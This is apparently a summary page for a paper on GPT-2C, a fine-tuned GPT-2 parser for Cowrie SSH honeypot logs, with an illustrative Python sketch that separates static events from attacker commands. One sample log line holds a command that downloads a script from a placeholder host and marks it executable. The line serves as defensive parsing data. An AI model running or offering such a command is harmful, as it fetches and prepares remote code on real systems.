CR · Sep 14, 2021

GPT-2C: A GPT-2 parser for Cowrie honeypot logs

arXiv:2109.06595v2
AI Analysis

The paper addresses interoperability issues between honeypots and security technologies such as EDR and SIEM, a practical concern for cybersecurity practitioners, but the contribution is incremental: it applies an existing method to a new domain.

The paper tackles the problem of parsing dynamic log topics from Cowrie SSH honeypot logs by developing GPT-2C, a system that fine-tunes GPT-2 for this task, achieving 89% inference accuracy with acceptable latency.

Deception technologies like honeypots produce comprehensive log reports, but often lack interoperability with EDR and SIEM technologies. A key bottleneck is that existing information transformation plugins perform well on static logs (e.g. geolocation), but face limitations when it comes to parsing dynamic log topics (e.g. user-generated content). In this paper, we present a run-time system (GPT-2C) that leverages large pre-trained models (GPT-2) to parse dynamic logs generated by a Cowrie SSH honeypot. Our fine-tuned model achieves 89% inference accuracy in the new domain and demonstrates acceptable execution latency.
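
To make the static versus dynamic distinction concrete, the following is a minimal sketch of how the two kinds of log content might be separated before any model is involved. It is not the GPT-2C pipeline, and nothing in it comes from the paper: it assumes Cowrie's JSON log writes one event per line and that typed commands arrive as events with eventid "cowrie.command.input" and the command text in an "input" field. The sample log lines and the helper name split_events are hypothetical.

```python
import json

# Hypothetical sample in the assumed Cowrie JSON-lines layout (one event per line).
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "session": "a1b2c3"}
{"eventid": "cowrie.command.input", "input": "wget http://example.com/x.sh; chmod +x x.sh", "session": "a1b2c3"}
not valid json
{"eventid": "cowrie.command.input", "input": "uname -a", "session": "a1b2c3"}
"""

# Assumption: this eventid marks attacker-typed commands (the dynamic content).
COMMAND_EVENT = "cowrie.command.input"


def split_events(lines):
    """Split log lines into static events and dynamic command inputs.

    Static events are returned as parsed dicts; dynamic inputs keep only the
    session id and the raw command text, which is the part a rule-based
    plugin struggles with and a learned parser would receive.
    """
    static_events, dynamic_inputs = [], []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the whole run
        if not isinstance(event, dict):
            continue
        if event.get("eventid") == COMMAND_EVENT and "input" in event:
            dynamic_inputs.append(
                {"session": event.get("session"), "input": event["input"]}
            )
        else:
            static_events.append(event)
    return static_events, dynamic_inputs


static_events, dynamic_inputs = split_events(SAMPLE_LOG.splitlines())
for item in dynamic_inputs:
    print(item["session"], "->", item["input"])
```

In a setup like the one the abstract describes, the free-form strings collected in dynamic_inputs would be the text handed to the fine-tuned model, while the static events could go through conventional field mapping.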
